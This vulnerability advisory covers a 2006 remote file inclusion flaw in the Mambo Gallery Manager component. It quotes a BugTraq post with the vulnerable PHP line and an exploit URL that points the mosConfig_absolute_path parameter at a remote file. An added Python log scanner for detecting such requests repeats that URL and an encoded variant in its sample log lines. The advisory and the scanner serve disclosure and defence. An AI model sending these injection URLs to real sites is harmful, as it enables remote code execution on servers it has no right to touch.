Security Vulnerability
Mambo Gallery Manager MosConfig_Absolute_Path Remote File Inclusion Vulnerability

Published: 2006-07-29
Updated: 2006-07-29

Affected systems:
mambo-foundation Gallery Manager Component 0.95 r3
Description:
BUGTRAQ  ID: 19224
CVE ID: CVE-2006-3980,CVE-2006-3981

Mambo is a content management system.

PHP remote file inclusion vulnerabilities in administrator/components/com_mgm/help.mgm.php and about.mgm.php in Mambo Gallery Manager for Mambo 0.95r2 and earlier allow remote attackers to execute arbitrary PHP code via the mosConfig_absolute_path parameter in the URL.

<*Source: A-S-T TEAM
  
  Link: http://xforce.iss.net/xforce/xfdb/28072
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

BugTraq
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities Jul 28 2006 09:48PM
A-S-T2006 hotmail com
----------------------------------------------------

Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities

----------------------------------------------------

Discovered By A-S-T TEAM

WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR

----------------------------------------------------

site of script: http://mamboxchange.com/frs/?group_id=175&release_id=1289

----------------------------------------------------

Vulnerable: Mambo Gallery Manager v095.r3(mgm)

----------------------------------------------------

vulnerable file :

------------------

help.mgm.php

----------------------------------------------------

vulnerable code:

----------------------------------------------------

require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";

$mosConfig_absolute_path File inclusion

----------------------------------------------------

Exploit:

http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt

----------------------------------------------------

Discovered By A-S-T TEAM

Site: www.lezr.com

Greetz: KING-HACKER, YOUNG_HACKER, SIMO64, ROOT-HACKED, SAUDI, QPTAN, POWERWALL, SNIPER_SA, ALMOKAN3, Broken-proxy, troq AND ALL LEZR.COM Member

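As an added example (not part of the advisory or the A-S-T TEAM post), the following Python script scans web-server access-log lines for requests that pass a remote URL in the mosConfig_absolute_path parameter of the two scripts named above, including percent- and double-percent-encoded values; the log lines are constructed and the Apache combined log format is assumed.

```python
"""Flag requests that inject a remote URL into the mosConfig_absolute_path
parameter of the Mambo Gallery Manager admin scripts named in the advisory."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory says include $mosConfig_absolute_path unchecked.
VULNERABLE_SCRIPTS = ("/administrator/components/com_mgm/help.mgm.php",
                      "/administrator/components/com_mgm/about.mgm.php")
# Apache combined log format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# A value starting with a URL scheme makes require() fetch the file remotely.
REMOTE_SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)

def is_rfi_attempt(request_target: str) -> bool:
    """True if the request hits a vulnerable script and its
    mosConfig_absolute_path parameter carries a remote URL."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(VULNERABLE_SCRIPTS):
        return False
    # parse_qs percent-decodes once; the extra unquote catches double encoding.
    query = parse_qs(parts.query, keep_blank_values=True)
    return any(REMOTE_SCHEME_RE.match(unquote(v))
               for v in query.get("mosConfig_absolute_path", []))

def scan_log(lines):
    """Return (client, timestamp, target, status) for every RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m.group(4)):
            hits.append((m.group(1), m.group(2), m.group(4), m.group(5)))
    return hits

# Constructed sample log lines; the first reuses the URL shape from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jul/2006:10:01:02 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt HTTP/1.1" 200 512
10.0.0.6 - - [29/Jul/2006:10:01:09 +0000] "GET /administrator/components/com_mgm/about.mgm.php?mosConfig_absolute_path=https%253A%252F%252F198.51.100.7%252Fx.txt HTTP/1.1" 200 498
10.0.0.7 - - [29/Jul/2006:10:02:00 +0000] "GET /administrator/components/com_mgm/help.mgm.php HTTP/1.1" 200 2048
10.0.0.8 - - [29/Jul/2006:10:02:30 +0000] "GET /index.php?mosConfig_absolute_path=http://evalcode.txt HTTP/1.1" 200 4096
""".splitlines()

if __name__ == "__main__":
    for client, ts, target, status in scan_log(SAMPLE_LOG):
        print(f"{ts} {client} status={status} {target}")
```

A local filesystem path in the parameter is not flagged, so a site that legitimately relies on register_globals for this value still produces no noise; only scheme-prefixed values are reported.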

Recommendation:
Vendor patch:

mambo-foundation
----------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to check the vendor's homepage for the latest version:

http://mambo-foundation.org/

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; do not reproduce without permission.